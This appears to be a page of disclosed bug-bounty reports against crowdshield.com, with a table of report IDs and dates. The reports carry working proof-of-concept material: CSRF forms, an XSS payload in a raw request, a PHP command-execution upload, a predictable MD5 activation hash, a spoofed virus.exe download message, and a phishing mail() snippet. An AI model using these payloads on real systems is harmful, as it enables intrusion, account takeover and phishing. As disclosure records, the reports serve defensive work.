When i went to register on your web site, i found you sent me activation url on my email with a simple hash: 1- https://crowdshield.com/account.php?hash=c7e1249ffc03eb9ded908c236bd1996d 2- https://crowdshield.com/account.php?hash=55a7cf9c71f1c9c495413f934dd1a158 3- https://crowdshield.com/account.php?hash=24b16fede9a67c9251d3e7c7161c83ac as you can see the three activation url for three email addresses, but the problem is the hash value is md5 for a random numbers c7e1249ffc03eb9ded908c236bd1996d => md5(87) 55a7cf9c71f1c9c495413f934dd1a158 => md5(492) 24b16fede9a67c9251d3e7c7161c83ac => md5(372) This lead attacker to register with any email on the internet that does't belongs to him and can active the account on crowdshield.com by easy way. Simple python script that request md5 values as https://crowdshield.com/account.php?hash=[PayLoad_here]
already provided to the head
bug_id=538&researcher_username=daksh&bug_category=Cross+Site+Request+Forgery&bounty_name=CrowdShield&sent_from=researcher&bug_comment=test&bug_reply=Reply All you need to do is change the sent_from=bounty and the comment ll be done on behalf of bounty admin.
Evidence and steps to reproduce provided to @1N3 via Slack.
Hi, I've just found RCE bug in your server. https://crowdshield.com/uploads/rce.php.jpg - this one executes normally, as php. :-) Code: <?php system("uname -a"); phpinfo(); ?>
for example i found ISC2 character limits bypass character limit is 60 so now i bypass to 100 character 1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 now i put 100 character https://www.youtube.com/watch?v=vMJRBUmHBmQ note : its unlisted video now more than 100 char there but limit 60 :p fix it soon Regards, sarath
<html> <body> <form action="http://crowdshield.com/login.php" method="POST"> <input type="hidden" name="username" value="user" /> <input type="hidden" name="password" value="pass123" /> <input type="hidden" name="submit" value="Login" /> <input type="submit" value="Submit request" /> </form> </body> </html>
<html> <body> <form action="http://crowdshield.com/report_bug_new.php" method="POST"> <input type="hidden" name="affected_url" value="sdf" /> <input type="hidden" name="affected_params" value="dsf" /> <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv sdggggggggggggggg" /> <input type="hidden" name="bug_evidence" value="dsf wertwetrwt" /> <input type="hidden" name="bug_recommendation" value="dsf ewrtretret" /> <input type="hidden" name="bug_category" value="Cross Site Scripting" /> <input type="hidden" name="submit_bug" value="Submit Bug" /> <input type="hidden" name="bounty_id" value="12" /> <input type="submit" value="Submit request" /> </form> </body> </html>
POST /account.php HTTP/1.1 Host: crowdshield.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://crowdshield.com/account.php Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=2424357188.8.131.528758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 315 researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36
Hi, I get in touch to report that crowdshield.com is vulnerable to content spoofing and text injection. This attack exploits the trust relationship established between the user and the web site. PoC http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin The URL path is URL decoded and attacker text is reflected back to the UI: "The requested URL / needs a new web client, please download http://attacker/virus.exe to we able to open it.” Please, let me know if you need further information Best Regards, Guifre.
Steps to Reproduce the BUG: 1) I have logged into two different browser with same password (the password is qwertyuiop2) 2) Now I am changing the password in one of the browser (new password is qwertyuiop3) 3) NOW EVEN AFTER CHANGING THE PASSWORD MY SESSION IN ANOTHER BROWSER IS STILL ALIVE. DANGER associated with this bug is that an ATTACKER can hijack the session and account of the VICTIM
Scenario: Researcher uses a shared computer. Researcher submits a report. Researcher logs out. Another person logs in, on another account. Another person submits a report. When entering a title, the title of the previous report submitted by the researcher is shown in autocompletion box. This gives away the title, report url & affected parameter of the bug to other users of the web browser, even though the researcher logged out properly.
POC An SMTP Relay can easily send an unauthorized email from "anything" @crowdshield.com domain for example [email protected] stating that Due to security reasons please Re-enter your password // or may say that you have been rewarded from crowdshield.com and to get reward please click below. A normal user will believe it as it is from the crowdshield.com mail server therefore, user would blindly believe and will fall for this trick. After User click the link there are many devastating possibilies which can be achieve by the attacker who would spoof as crowdshield.com authentic person. For example PHP language can be used to send email from crowdshield.com domain. SMTP relay is possible <?php $to = "[email protected]"; $subject = "Change your Password "; $txt = "Change your password by visiting here - [VIRUS LINK HERE]l"; $headers = "From: [email protected]"; mail($to,$subject,$txt,$headers); ?>
|670||High||Remote Code Execution||zoczus||05/06/2015||Disclosed|
|578||Medium||Cross Site Request Forgery||sandeepv||11/30/2014||Disclosed|
|580||Medium||Cross Site Request Forgery||sandeepv||11/30/2014||Disclosed|
|659||Medium||Reflected Cross Site Scripting||pratap||12/16/2014||Disclosed|
|724||Low||Session Security and Cookies||testingcs||04/24/2016||Disclosed|